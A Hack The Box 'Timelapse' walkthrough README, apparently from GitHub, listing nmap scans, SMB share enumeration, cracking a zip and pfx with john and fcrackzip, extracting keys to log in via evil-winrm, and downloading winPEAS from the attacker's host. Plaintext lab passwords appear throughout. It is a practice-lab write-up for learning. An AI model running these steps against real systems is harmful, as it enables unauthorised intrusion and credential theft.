HTB Timelapse Notes

About The Project

Timelapse HTB Machine

Steps

1. Nmap Scans:

 nmap -p- 10.10.11.152

   PORT      STATE SERVICE          REASON
   53/tcp    open  domain           syn-ack ttl 127
   88/tcp    open  kerberos-sec     syn-ack ttl 127
   135/tcp   open  msrpc            syn-ack ttl 127
   139/tcp   open  netbios-ssn      syn-ack ttl 127
   389/tcp   open  ldap             syn-ack ttl 127
   445/tcp   open  microsoft-ds     syn-ack ttl 127
   464/tcp   open  kpasswd5         syn-ack ttl 127
   593/tcp   open  http-rpc-epmap   syn-ack ttl 127
   636/tcp   open  ldapssl          syn-ack ttl 127
   3268/tcp  open  globalcatLDAP    syn-ack ttl 127
   3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
   5986/tcp  open  wsmans           syn-ack ttl 127
   9389/tcp  open  adws             syn-ack ttl 127
   49667/tcp open  unknown          syn-ack ttl 127
   49673/tcp open  unknown          syn-ack ttl 127
   49674/tcp open  unknown          syn-ack ttl 127
   49696/tcp open  unknown          syn-ack ttl 127
   51231/tcp open  unknown          syn-ack ttl 127

   nmap -sVC 10.10.11.152

   PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-13 15:03:29Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?      syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

2.SMB Enumeration:

 smbclient -N -L 10.10.11.152

Sharename       Type      Comment
     ---------       ----      -------
     ADMIN$          Disk      Remote Admin
     C$              Disk      Default share
     IPC$            IPC       Remote IPC
     NETLOGON        Disk      Logon server share 
     Shares          Disk      
     SYSVOL          Disk      Logon server share

Ivestiating we find several files on Shares share:

smbclient \\\\10.10.11.152\\Shares

 LAPS_Datasheet.docx               LAPS.x64.msi
 LAPS_OperationsGuide.docx         winrm_backup.zip
 LAPS_TechnicalSpecification.docx

winrm_backup seems interesting but its password protected. DOCX Files contain documentation about how passwords are managed arround the directory.

3.Cracking ZIP:

lets try to crack the zip

fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt

PASSWORD FOUND!!!!: pw == supremelegacy

Zip password was weak: supremelegacy We obtain legacyy_dev_auth.pfx

4.Cracking pfx:

A quick Google search about extracting cert keys from pfx: https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file but we need to obtain the pfx key first so we are gonna try to crack it using john Convert:

pfx2john legacyy_dev_auth.pfx > pfx_john_legacy.hash

john -w=/usr/share/wordlists/rockyou.txt pfx_john_legacy.hash

Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:02:13 DONE (2022-06-13 04:00) 0.007506g/s 24256p/s 24256c/s 24256C/s thuglife03282006..thug209
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Found pfx pass: thuglegacy

Now lets extract key and cert:

Extract cert:

openssl pkcs12 -in legacyy_dev_auth.pfx -out cert.pem

Extract priv key:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.pem -nodes

After formatting the files correctly we can connect via ssh:

evil-winrm -S -k formated/key.key -c formated/cert.crt -i 10.10.11.152

USER FLAG OWNED

5:Privilege Escalation (System OWN):

Lets run winpeas:

Invoke-WebRequest -Uri 10.10.14.20:8000/winPEASx64.exe -OutFile winpeas.exe

My pass is : E3R$Q62^12p7PLlC%KWaxuaV

``sh pass: : G!OSV[!-e[-w).,4rK6G,78/

License

Distributed under the MIT License. See LICENSE.txt for more information.

(back to top)

Contact

Pol Galvez - [email protected]

(back to top)

Acknowledgments

aidenpearce369.github.io

(back to top)

polgs / htb-timelapse Goto Github PK

htb-timelapse's Introduction

HTB Timelapse Notes

About The Project

Steps

1. Nmap Scans:

2.SMB Enumeration:

3.Cracking ZIP:

4.Cracking pfx:

USER FLAG OWNED

5:Privilege Escalation (System OWN):

License

Contact

Acknowledgments

htb-timelapse's People

Contributors

Watchers

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent

Jobs